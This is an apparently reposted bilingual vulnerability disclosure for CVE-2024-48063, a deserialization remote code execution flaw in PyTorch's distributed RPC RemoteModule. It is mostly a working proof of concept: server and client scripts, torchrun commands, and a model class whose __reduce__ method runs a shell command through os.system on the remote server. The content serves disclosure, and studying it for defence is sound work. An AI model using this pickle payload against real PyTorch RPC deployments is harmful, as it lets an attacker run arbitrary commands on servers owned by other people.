Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063)
Description 描述
credit:HRP Aftersnow gxh
Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch
分布式 RPC 框架 RemoteModule 在 pytorch/pytorch 中 具有反序列化 RCE
分布式 RPC 框架 RemoteModule 在 pytorch/pytorch 中 具有反序列化 RCE
Proof of Concept 概念验证
init environment init 环境
Plain Text 纯文本
拷贝
export MASTER_ADDR=127.0.0.1 export MASTER_PORT=5000 export TP_SOCKET_IFNAME=ens18 export GLOO_SOCKET_IFNAME=ens18
the server code 服务器代码
ser.py
Plain Text 纯文本
拷贝
import torch import torch.distributed.rpc as rpc def run_server(): # Initialize server-side RPC rpc.init_rpc(“server”, rank=0, world_size=2) # Wait for the client’s remote call rpc.shutdown() if __name__ == “__main__”: run_server()
exec this to run 执行此命令以运行
Plain Text 纯文本
拷贝
torchrun –nproc_per_node=1 –nnodes=2 –node_rank=0 –master_addr=127.0.0.1 –master_port=5000 ser.py
POC 概念验证
the client code and is exp
客户端代码 和 EXP
客户端代码 和 EXP
cli.py
Plain Text 纯文本
拷贝
import torch import torch.distributed.rpc as rpc from torch.distributed.nn.api.remote_module import RemoteModule import torch.nn as nn # Define a simple neural network model MyModel class MyModel(nn.Module): def __init__(self): super(MyModel, self).__init__() # A simple linear layer with input dimension 2 and output dimension 2 self.fc = nn.Linear(2, 2) # Define the forward method def __reduce__(self): return (__import__(‘os’).system, (“id;ls”,)) def run_client(): # Initialize client-side RPC rpc.init_rpc(“client”, rank=1, world_size=2) # Create a remote module to run the model on the server side remote_model = RemoteModule( “server”, # Server-side device MyModel(), # Definition of the remote module’s model args=() # Model initialization parameters ) # Remotely call the model with an input tensor input_tensor = torch.tensor([1.0, 2.0]) output = remote_model(input_tensor) print(“Output from remote model:”, output) # Shutdown RPC rpc.shutdown() if __name__ == “__main__”: run_client()
exec this to run 执行此命令以运行
Plain Text 纯文本
拷贝
torchrun –nproc_per_node=1 –nnodes=2 –node_rank=1 –master_addr=127.0.0.1 –master_port=5000 cli.py
now we can see the output in server
现在我们可以在 Server 中看到输出
现在我们可以在 Server 中看到输出
ALT
Impact 冲击
Remote execution of arbitrary commands through deserialization
通过反序列化远程执行任意命令
通过反序列化远程执行任意命令
原文始发于rumbling-slice-eb0:Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063)
版权声明:admin 发表于 2024年10月31日 下午5:55。
转载请注明:Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063) | CTF导航
转载请注明:Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063) | CTF导航